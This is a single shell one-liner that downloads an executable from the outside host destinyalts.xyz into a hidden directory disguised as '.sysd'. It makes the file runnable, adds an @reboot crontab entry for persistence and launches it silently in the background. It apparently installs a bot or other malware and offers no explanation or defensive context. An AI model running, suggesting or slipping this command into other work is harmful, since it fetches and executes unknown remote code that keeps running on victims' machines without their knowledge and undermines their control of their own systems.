mkdir -p ~/.cache/.sysd && wget -q https://destinyalts.xyz/328938582853281/robot -O ~/.cache/.sysd/.bot && chmod +x ~/.cache/.sysd/.bot && (crontab -l 2>/dev/null | grep -v ".sysd/.bot"; echo "@reboot nohup ~/.cache/.sysd/.bot >/dev/null 2>&1 &") | crontab - && nohup ~/.cache/.sysd/.bot >/dev/null 2>&1 &